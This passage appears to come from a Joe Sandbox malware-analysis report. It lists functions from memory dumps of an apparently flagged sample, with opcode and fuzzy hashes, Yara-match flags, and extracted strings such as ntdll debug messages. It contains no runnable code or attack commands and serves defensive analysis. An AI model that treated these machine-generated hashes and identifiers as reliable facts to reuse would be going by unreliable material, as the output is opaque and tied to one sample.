                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5017dde4e6e3ef9b0edde623a278892a51e04db28387dd80d97b9d66c950489a
                                                  • Instruction ID: 2ac2b6b158f879e9af574ebe1226cc4f3a45a1986a68a22b43a54463fa581f23
                                                  • Opcode Fuzzy Hash: 5017dde4e6e3ef9b0edde623a278892a51e04db28387dd80d97b9d66c950489a
                                                  • Instruction Fuzzy Hash: DA90027124140406D140715D4404746000597D1701F55C015A6068554EC66ACFD96766
                                                  Function 018B2EE0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10400c156a25e134fab501b4d76f97bd0945e187e96fd52b4788fb85e3e0c9c7
                                                  • Instruction ID: 7e7930a0f58d44ff7ddd3c3d28fe68c957d7afa2decc992c7bf391f732901ce8
                                                  • Opcode Fuzzy Hash: 10400c156a25e134fab501b4d76f97bd0945e187e96fd52b4788fb85e3e0c9c7
                                                  • Instruction Fuzzy Hash: 3C90026124180407D140755D4804607000597D1702F55C015A3068555ECA3ACE556236
                                                  Function 018B2E30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bb6e891c602617f795f2e0d285acdac6e0b308a52e055d6451d97013513acfa
                                                  • Instruction ID: d5387589482fa35247b537fc47aa7482e5396a04873b317860a3d58e34e472ac
                                                  • Opcode Fuzzy Hash: 0bb6e891c602617f795f2e0d285acdac6e0b308a52e055d6451d97013513acfa
                                                  • Instruction Fuzzy Hash: B790022134140406D102715D44146060009D7D2745F95C016E2428555DC636CB57A233
                                                  Function 018B3090 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b139ad50bc320c27f8b0f58ff8a1861780332780fc70d46009ba781f4afef492
                                                  • Instruction ID: 50504d5406e95546b8591356b68699ce21f6ccab678048840cc952b8025ae15a
                                                  • Opcode Fuzzy Hash: b139ad50bc320c27f8b0f58ff8a1861780332780fc70d46009ba781f4afef492
                                                  • Instruction Fuzzy Hash: 5D90022128140806D140715D84147070006D7D1B01F55C015A1028554DC627CB6967B2
                                                  Function 018B3010 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 210021f1873f12fdad3f880a444528e4af8016ceccac473dcdd26c5133d26fb6
                                                  • Instruction ID: 404fb4c779d2f4837fdb9ba5e59918910a5385beca89e681ce9254a45ec8a268
                                                  • Opcode Fuzzy Hash: 210021f1873f12fdad3f880a444528e4af8016ceccac473dcdd26c5133d26fb6
                                                  • Instruction Fuzzy Hash: 8690022124184446D140725D4804B0F410597E2702F95C01DA515A554CC926CA595722
                                                  Function 018B39B0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d9af8de502e768cc2f59ed6ab10d7fd9a5d35d980c48b70b39c30575fcc38a4
                                                  • Instruction ID: 92483afed7c4acf4b95b1a7373f13700d3b4e57542767bede29e4818b6151624
                                                  • Opcode Fuzzy Hash: 1d9af8de502e768cc2f59ed6ab10d7fd9a5d35d980c48b70b39c30575fcc38a4
                                                  • Instruction Fuzzy Hash: 4E90022128545106D150715D44046164005B7E1701F55C025A1818594DC566CA596322
                                                  Function 018B3D10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 793a22f68c2f8de32763fde7b2ae16a7e39331a30c8cf4b6d19ade19510fa106
                                                  • Instruction ID: f6de1ab90d5a91d49819d6c4e8b3964222d67760fa4d09341401812a8b38d5d7
                                                  • Opcode Fuzzy Hash: 793a22f68c2f8de32763fde7b2ae16a7e39331a30c8cf4b6d19ade19510fa106
                                                  • Instruction Fuzzy Hash: 6E900231242401469540725D5804A4E410597E2702B95D419A1019554CC925CA655322
                                                  Function 018B3D70 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e9bb2057ddb7b62971101a845e2e110919b5438dcfb4baca2bd83655717a031
                                                  • Instruction ID: 304ab3e1ab3e358954653f52b2b66e6cff36f839b921885bed76439d21ae3001
                                                  • Opcode Fuzzy Hash: 0e9bb2057ddb7b62971101a845e2e110919b5438dcfb4baca2bd83655717a031
                                                  • Instruction Fuzzy Hash: F690023524140406D510715D5804646004697D1701F55D415A1428558DC665CAA5A222
                                                  Function 018B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 5365ebacb85016ef6a055ebe2efd00c6b1d9e9197f1b80aa326784539b3fa380
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Function 018B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: d15ee02150041b92f8a465b57305d24de81f3d42e7781e01e775a513e896975c
                                                  • Instruction ID: d9b527f51f0bc46319c997792f24966c68b41497bc9a7d17118bc04a52ac4e92
                                                  • Opcode Fuzzy Hash: d15ee02150041b92f8a465b57305d24de81f3d42e7781e01e775a513e896975c
                                                  • Instruction Fuzzy Hash: 8651E6B5A0011AAFCB25DB9C88D09BEFBB9BB097407108229F4A9D7741D334EF0087E0
                                                  Function 01922410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 15ae5ac6249c11b94c5e19f788e0254af63288e3bf3044eca6408c9c3db108a2
                                                  • Instruction ID: 17a5eb5130acef1552d0e9e9a6694d32283f3a6f8c5d7592581c03d2ab120898
                                                  • Opcode Fuzzy Hash: 15ae5ac6249c11b94c5e19f788e0254af63288e3bf3044eca6408c9c3db108a2
                                                  • Instruction Fuzzy Hash: E6512475A00666AFCB31DF9CC89087EBBFCEF44601B048829F49AD7645EA74DB00C760
                                                  Function 018A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018E46FC
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018E4655
                                                  • Execute=1, xrefs: 018E4713
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018E4742
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 018E4787
                                                  • ExecuteOptions, xrefs: 018E46A0
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018E4725
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: b14db301e043ecafcb336a4e17eb369b36e211cbd46f5b35eda2182e672e6c46
                                                  • Instruction ID: 0cdb327022f1638096f3eeb42f5bca6786914c1c27a769e0211db944c1483177
                                                  • Opcode Fuzzy Hash: b14db301e043ecafcb336a4e17eb369b36e211cbd46f5b35eda2182e672e6c46
                                                  • Instruction Fuzzy Hash: 715106316002196BFF21ABA8DC89FEA7BB8EF15304F4400A9D605E7291E7729F459F51
                                                  Function 01946940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                  • Instruction ID: f37503c0bd53b61a04ad7fd15ba14cd836db91b986bf392e02e4a3f6724c1941
                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                  • Instruction Fuzzy Hash: 580217B1508342AFD319CF18C890E6BBBE9EFC9704F14892DF9998B254DB31E945CB52
                                                  Function 018BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: 1b17e12b7115102497af8d54a12dc117d572353fb6427c6442e1cb3e7e647fb0
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: F981CF70E452499FEF258E6CC8D17FEBBB1AF46360F18421AE861E7391C7349A40CB55
                                                  Function 019220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: 9bad079439c460bcc9d7decd6456f70e5a929365ba9c906246163e56a9729b94
                                                  • Instruction ID: 91a198c7728fb90b69dd276b151f0999ff882c4c39799294dc8d9ae9027f2bd8
                                                  • Opcode Fuzzy Hash: 9bad079439c460bcc9d7decd6456f70e5a929365ba9c906246163e56a9729b94
                                                  • Instruction Fuzzy Hash: 5B21517AA00129ABDB11DF6DCC40EEEBBECBF54744F14012AE909E3205E730DA018BA1
                                                  Function 0189F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018E02BD
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018E02E7
                                                  • RTL: Re-Waiting, xrefs: 018E031E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: 3d09476516a5d2e15914ec0297e08516a52c2156c0e8a893837a2a539a7c4e81
                                                  • Instruction ID: 878297c8b608284d2be1f72dbfb4170b5e995ac964861b8d21cf5d5473b20847
                                                  • Opcode Fuzzy Hash: 3d09476516a5d2e15914ec0297e08516a52c2156c0e8a893837a2a539a7c4e81
                                                  • Instruction Fuzzy Hash: D5E18F306047419FDB2ACF2CC884B6ABBE0BB85318F180A5DF6A5CB2D1D774DA45CB52
                                                  Function 018ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 018E7B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018E7B7F
                                                  • RTL: Re-Waiting, xrefs: 018E7BAC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: e3af85d658c04925feeff9e3a585718b932951c4d9cfd1a7e3a1a7abcada8138
                                                  • Instruction ID: 5e14fb5a1ee92ba852ca730be386f2807c373350a84ae421ec57a1f412913974
                                                  • Opcode Fuzzy Hash: e3af85d658c04925feeff9e3a585718b932951c4d9cfd1a7e3a1a7abcada8138
                                                  • Instruction Fuzzy Hash: B34106353007429FEB20DE29C840B6AB7E9EF89710F540A1DFA5AD7780DB71EA058B91
                                                  Function 018AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018E728C
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 018E72A3
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018E7294
                                                  • RTL: Re-Waiting, xrefs: 018E72C1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 243a80932c75a10f29c1b9af13ca4660ad8c5e698b1f3b00979b9f5b06cb97dc
                                                  • Instruction ID: b2d28844217699ed73af12a52f6476c30bf96f75d0d2ef4913247728e0ebe889
                                                  • Opcode Fuzzy Hash: 243a80932c75a10f29c1b9af13ca4660ad8c5e698b1f3b00979b9f5b06cb97dc
                                                  • Instruction Fuzzy Hash: 7441E231701606ABE721DE29CC81B6ABBE5FF95714F100619FA56EB340DB31EA4287D1
                                                  Function 01922300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 91a9b744398bae68744331b19cea39f1f1d54eb532d1656b246740c48b6b9930
                                                  • Instruction ID: c352e2da5a07ff216f66ea1e77ef6ac279a70ef498744c6e92133df8ec223767
                                                  • Opcode Fuzzy Hash: 91a9b744398bae68744331b19cea39f1f1d54eb532d1656b246740c48b6b9930
                                                  • Instruction Fuzzy Hash: C2318472A002299FDB20DF2DDC40BEEB7FCEF54A51F440559E94DE3204EB30AA448BA0
                                                  Function 018B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction ID: ea0e6f586c5e0df14388a3651e59aa3ac243c0d505deaa92591be3c5f7fbe27e
                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction Fuzzy Hash: 6D919071E0030A9AEB24DF6DC8C1AFEBBA5AF84760F14451AE965E73C0D7309B418B15
                                                  Function 01879126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 429e4df0f9d89d67c7259acc21282e0179f9ca0b8f461c20b792a3f402413e3f
                                                  • Instruction ID: 1e3f83e07507b9d3ead320fb7dda8e7c3917986d7c745428f89a8c35b3f79a50
                                                  • Opcode Fuzzy Hash: 429e4df0f9d89d67c7259acc21282e0179f9ca0b8f461c20b792a3f402413e3f
                                                  • Instruction Fuzzy Hash: 94811A71D002699BDB31DB58CC44BEAB7B9AB48714F0041DAEA19F7240D7309F84CFA1

                                                  Executed Functions

                                                  Function 03289F84 Relevance: 34.1, Strings: 27, Instructions: 380COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$4$:$@$C$D$JF$K$N.$O$Q$T$]$^$`x~I$db$di$e$eZ$ib$p$q$r$t^$~I$A$E
                                                  • API String ID: 0-2738039699
                                                  • Opcode ID: 5fadb60d9c5df601eb4a7b91a34219dc60b3cb95d93e122eadd8f9443d7451f7
                                                  • Instruction ID: 6646ff721dbf616d940e3cc72cc03b81c00e27503fe2f8ccf51312d589c9aa25
                                                  • Opcode Fuzzy Hash: 5fadb60d9c5df601eb4a7b91a34219dc60b3cb95d93e122eadd8f9443d7451f7
                                                  • Instruction Fuzzy Hash: C6228CB0D16268CBEB64DF44C998BDDBBB1BB44308F1081DAD14D6B281CBB95AC9CF54
                                                  Function 03297A24 Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$O$S$\$s
                                                  • API String ID: 0-3854637164
                                                  • Opcode ID: 071edb34f553cb0daa9a22acf88cf664d747ded34cf59aa42faaeb9f002bb0a4
                                                  • Instruction ID: 4e0d9310085a8f9f56ef7f084ad6f8f7953a008b8698ece8858824ae448ce4f5
                                                  • Opcode Fuzzy Hash: 071edb34f553cb0daa9a22acf88cf664d747ded34cf59aa42faaeb9f002bb0a4
                                                  • Instruction Fuzzy Hash: 09518672D20618ABDF10DB98DC85EFFB3B8EF44711F04419AEA095B140E7B55A84CBE1
                                                  Function 032A4D04 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: nd
                                                  • API String ID: 0-4034458007
                                                  • Opcode ID: 633ee47aa612357759acb75fff59d345b0a87899d0e498fc19daf063568c2cb6
                                                  • Instruction ID: 03d870fab66ea2e84451da4b7c432dc7a449b74ca9983bc02d34173170bf3e50
                                                  • Opcode Fuzzy Hash: 633ee47aa612357759acb75fff59d345b0a87899d0e498fc19daf063568c2cb6
                                                  • Instruction Fuzzy Hash: 9E2133B6D1121CAF8B00DFA9D8409EFB7F9EF88210F04416AE915E7240E7705A55CBE0
                                                  Function 032836A5 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac42bb49d7b48f9f4346b038e28b4af7c2d02852f1c2d0da4ccb0c516549dc3a
                                                  • Instruction ID: f9fdcbeda7afa5891cde58d12d6ef40bcc177294f249517ce5cbc9078cdbea19
                                                  • Opcode Fuzzy Hash: ac42bb49d7b48f9f4346b038e28b4af7c2d02852f1c2d0da4ccb0c516549dc3a
                                                  • Instruction Fuzzy Hash: 5F411EB5D11219AFDB04DF99C881AEEBFBCFF49B10F10415AFA14E6240E7B09641CBA4
                                                  Function 032A8454 Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ccf73b2761c1b058d7e2dfc6711166434df799c2481e42ace390cfb67d31680
                                                  • Instruction ID: a3c2fc44443e4378f139e239eb39bb41d28d9d22c46be351e42e10d0f4da2623
                                                  • Opcode Fuzzy Hash: 2ccf73b2761c1b058d7e2dfc6711166434df799c2481e42ace390cfb67d31680
                                                  • Instruction Fuzzy Hash: A531F9B5A11609AFDB14DF59D981EEFBBB8EF88300F108119F908A7340D774A952CBA5
                                                  Function 032A8DE4 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51d174708944d95a3c9e064509bc915ca0361f137e007a55436f812dfd897663
                                                  • Instruction ID: 51b60093e820e70bc781e00c217718c610ad6d09d8d57d92aa1caf60357f59f9
                                                  • Opcode Fuzzy Hash: 51d174708944d95a3c9e064509bc915ca0361f137e007a55436f812dfd897663
                                                  • Instruction Fuzzy Hash: 4221FCB5A11649AFDB14DF58D841EAFBBB8EF88710F008109FD18A7280D770A952CBA5
                                                  Function 03297864 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f06f3bb82fa9b66ebd08b8123232c9e4f74445cabe9092793dfd86dc057e0337
                                                  • Instruction ID: fd4802fcdb2cac4c291bb4ec3b9c13e659bacafd10b9b22f72d72a9a063b7484
                                                  • Opcode Fuzzy Hash: f06f3bb82fa9b66ebd08b8123232c9e4f74445cabe9092793dfd86dc057e0337
                                                  • Instruction Fuzzy Hash: C011A0B67907057BF720EA599C42FAB775CAB84F11F244055FB08AE2C0D6E4B84286B8
                                                  Function 032A8264 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_2f80000_jCNfinsYqEsIM.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
